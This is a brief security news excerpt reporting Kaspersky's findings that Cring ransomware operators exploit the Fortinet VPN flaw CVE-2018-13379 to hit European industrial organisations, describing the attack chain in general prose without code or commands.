According to Kaspersky’s researchers, Cring ransomware operators are targeting unpatched Fortinet VPN devices/servers.
Kaspersky researchers identified a new ransomware strain called Cring that’s exploiting a widely reported vulnerability impacting unpatched Fortinet VPN devices. The ransomware is targeting industrial sector organizations in European countries and encrypting their networks.
In one incident, the ransomware caused a temporary shutdown of an organization’s industrial process after the server was encrypted. There is no news about how this issue was resolved.
Cring Ransomware is also called Crypt3r, Phantom, Ghost, and Vjiszy1lo. It was first discovered in January by Amigi_A, and Swisscom’s CSIRT team spotted it.
How the Attack Works?
The ransomware operators drop customized Mimikatz samples and Cobalt Strike threat emulation framework after they gain initial access to their targeted network. Then they deploy the Cring ransomware payload after downloading it onto the device using authentic Windows CertUtil certificate manager to deceive security software.
According to Kaspersky’s research, attackers are exploiting those Fortigate SSL VPN servers that are still not patched against the CVE-2018-13379 vulnerability. Although Fortinet issued a patch last year to fix this vulnerability, there are many networks that haven’t yet deployed the security update.
This vu ..
Support the originator by clicking the read the rest link below.
![When ATT&CK is the best form of defence [EMEA]](upload/news/image_1617912007_61039385.png)
